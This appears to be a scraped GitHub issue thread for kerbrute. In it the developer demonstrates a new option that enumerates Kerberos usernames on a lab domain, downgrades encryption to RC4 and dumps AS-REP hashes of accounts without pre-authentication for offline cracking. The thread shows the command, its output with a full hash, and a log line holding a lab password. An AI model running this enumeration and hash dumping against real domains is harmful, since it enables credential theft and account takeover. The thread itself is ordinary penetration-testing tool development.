Comments (2)
Okay did this one better and added support for dumping received ASREPS in a crackable format:
❯ ./kerbrute -d lab.ropnop.com --hash-file hashes.txt --downgrade userenum users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 11/15/20 - Ronnie Flathers @ropnop
2020/11/15 18:27:11 > Saving any captured hashes to hashes.txt
2020/11/15 18:27:11 > Using downgraded encryption: arcfour-hmac-md5
2020/11/15 18:27:11 > Using KDC(s):
2020/11/15 18:27:11 > pdc01.lab.ropnop.com:88
2020/11/15 18:27:11 > [+] VALID USERNAME: [email protected]
2020/11/15 18:27:11 > [+] VALID USERNAME: [email protected]
2020/11/15 18:27:11 > [+] athomas has no pre auth required. Dumping hash to crack offline:
[email protected]:a5882b2dd7eef09381b1057830502462$ef6080613f527da9a390b249bdbb39e0185158cdc52877c39eefa27589e39bfa455cacfbee36846dff5f18d657cb64c88e33875db46c2cb1420ff953d90918883385370184db024f07e0738b5c841f1108df04d16798b2943ea38241532545b9fa9cedbdcc0d2248a607a6e954e5e5abab76368144202d758a6fb62178477d9f8e1b288270997ebe90f0ad0a8d078189d2bfc7ecdbe9f7df6306fc2ead7d4c4fb043e37c0be044a3dedc2080f0883dcf69d97317822845863d131fda6725dceca187821fefec415811a224245bc4944521a273a7a7a26e474a4c74a004b4f59746e8cf7d143ce633fadcdeb26961a97a
2020/11/15 18:27:11 > [+] VALID USERNAME: [email protected]
2020/11/15 18:27:11 > Done! Tested 10 usernames (3 valid) in 0.243 seconds
Feel free to go build
the latest commit and lmk what you think!
from kerbrute.
Hmm good idea. So I actually do call that out in the logs when it’s encountered (but only if you have verbose on). E.g.:
2020/06/07 11:31:27 > [!] [email protected]:Password1234 - Got AS-REP (no pre-auth) but couldn't decrypt - bad password
But I can see the value in pointing that more - maybe I’ll add that message on the default verbosity level so you can see it more clearly
from kerbrute.
Related Issues (20)
- Typo HOT 2
- [Feature Request] Pass the Hash Support HOT 3
- Please delete
- [feature request] decoy
- Kerbrute erroring out on some accounts HOT 1
- Error: accepts 1 arg(s), received 2 HOT 1
- Kerbrute running into Encoding Error HOT 6
- KDC ERROR - Wrong Realm.
- ARM version? HOT 5
- close
- Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated HOT 4
- kerbrute not working with aarch64 HOT 2
- Error execution
- [Feature Request] Semi-Safe mode
- Password spray attempt increase badPwd counter by 2 HOT 2
- ARM binary support HOT 1
- panic: runtime error: invalid memory address or nil pointer dereference
- Error ensure resolv.conf
- Realm gets uppercase'd which doesn't work with Linux Kerberos 5 implementation
- Error on redirection on the "release" link
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from kerbrute.